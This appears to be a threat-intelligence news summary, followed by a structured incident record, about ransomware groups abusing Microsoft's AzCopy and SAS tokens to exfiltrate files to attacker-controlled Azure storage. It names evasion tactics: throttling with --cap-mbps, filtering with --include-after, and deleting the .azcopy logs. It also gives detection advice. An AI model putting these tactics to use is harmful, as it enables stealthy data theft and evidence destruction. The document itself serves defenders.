Varonis Threat Labs: Trusted Azure Utility AzCopy Turned into Data Exfiltration Tool in Active Ransomware Campaigns

Ransomware Operators Exploit Microsoft’s AzCopy for Stealthy Data Theft

Ransomware groups are increasingly weaponizing legitimate IT tools to evade detection, with Microsoft’s AzCopy a command-line utility for Azure data transfers now a favored method for exfiltrating sensitive files before encryption. This tactic allows attackers to blend malicious activity with routine cloud operations, making detection difficult for security teams.

How the Attack Works
AzCopy, designed for enterprise data migration, operates as a standalone executable over HTTPS, bypassing traditional Endpoint Detection and Response (EDR) alerts due to its trusted status. Threat actors generate Shared Access Signature (SAS) tokens temporary, credential-free URLs to route stolen data to attacker-controlled Azure Blob Storage accounts. These tokens, active for as little as three days and eight hours, limit exposure while enabling large-scale transfers.

Attackers further refine their approach by:

• Using --include-after to target only recently modified files.
• Throttling upload speeds with --cap-mbps to avoid triggering network anomaly alerts.
• Deleting AzCopy’s hidden log directory (.azcopy) post-exfiltration to erase forensic evidence.

Impact and Detection Challenges
The shift to Azure-based exfiltration complicates defense efforts. Since data flows through Microsoft’s infrastructure, it mimics legitimate business traffic, delaying detection until stolen files appear on ransomware leak sites. Varonis Threat Labs identified multiple incidents where AzCopy went undetected by EDR platforms, underscoring the tactic’s effectiveness.

Organizations are advised to monitor outbound connections to *.blob.core.windows.net from non-Azure systems and leverage User and Entity Behavior Analytics (UEBA) to flag unusual file access patterns. However, the attack’s stealthy nature highlights the growing sophistication of ransomware operations leveraging trusted tools.

Source: https://cybersecuritynews.com/trusted-azure-utility-azcopy-turned/

Varonis cybersecurity rating report: https://www.rankiteo.com/company/varonis

"id": "VAR1772634393",
"linkid": "varonis",
"type": "Cyber Attack",
"date": "3/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"

{'attack_vector': 'Legitimate IT tool exploitation (AzCopy)',
 'data_breach': {'data_encryption': True,
                 'data_exfiltration': True,
                 'sensitivity_of_data': 'High (exfiltrated before encryption)',
                 'type_of_data_compromised': 'Sensitive files'},
 'description': 'Ransomware groups are increasingly weaponizing legitimate IT '
                'tools to evade detection, with Microsoft’s AzCopy—a '
                'command-line utility for Azure data transfers—now a favored '
                'method for exfiltrating sensitive files before encryption. '
                'This tactic allows attackers to blend malicious activity with '
                'routine cloud operations, making detection difficult for '
                'security teams.',
 'impact': {'data_compromised': 'Sensitive files exfiltrated',
            'operational_impact': 'Delayed detection due to stealthy '
                                  'exfiltration'},
 'lessons_learned': 'Legitimate IT tools like AzCopy can be weaponized for '
                    'stealthy data exfiltration, evading traditional EDR '
                    'detection. Organizations must monitor outbound cloud '
                    'traffic and implement UEBA to detect anomalous file '
                    'access patterns.',
 'motivation': 'Financial gain (ransomware extortion)',
 'post_incident_analysis': {'corrective_actions': ['Enhanced monitoring of '
                                                   'cloud data transfers',
                                                   'UEBA implementation for '
                                                   'anomaly detection',
                                                   'Restriction of SAS token '
                                                   'usage'],
                            'root_causes': 'Abuse of trusted cloud tools '
                                           '(AzCopy) and SAS tokens for '
                                           'stealthy exfiltration'},
 'ransomware': {'data_encryption': True, 'data_exfiltration': True},
 'recommendations': ['Monitor outbound connections to *.blob.core.windows.net '
                     'from non-Azure systems',
                     'Leverage User and Entity Behavior Analytics (UEBA) to '
                     'flag unusual file access patterns',
                     'Restrict or audit the use of Shared Access Signature '
                     '(SAS) tokens',
                     'Implement throttling controls to detect abnormal data '
                     'transfer speeds',
                     'Enhance logging and retention for cloud-based data '
                     'transfers'],
 'references': [{'source': 'Varonis Threat Labs'}],
 'response': {'enhanced_monitoring': 'Monitor outbound connections to '
                                     '*.blob.core.windows.net; leverage User '
                                     'and Entity Behavior Analytics (UEBA)'},
 'title': 'Ransomware Operators Exploit Microsoft’s AzCopy for Stealthy Data '
          'Theft',
 'type': 'Ransomware',
 'vulnerability_exploited': 'Abuse of Shared Access Signature (SAS) tokens and '
                            'trusted cloud tools'}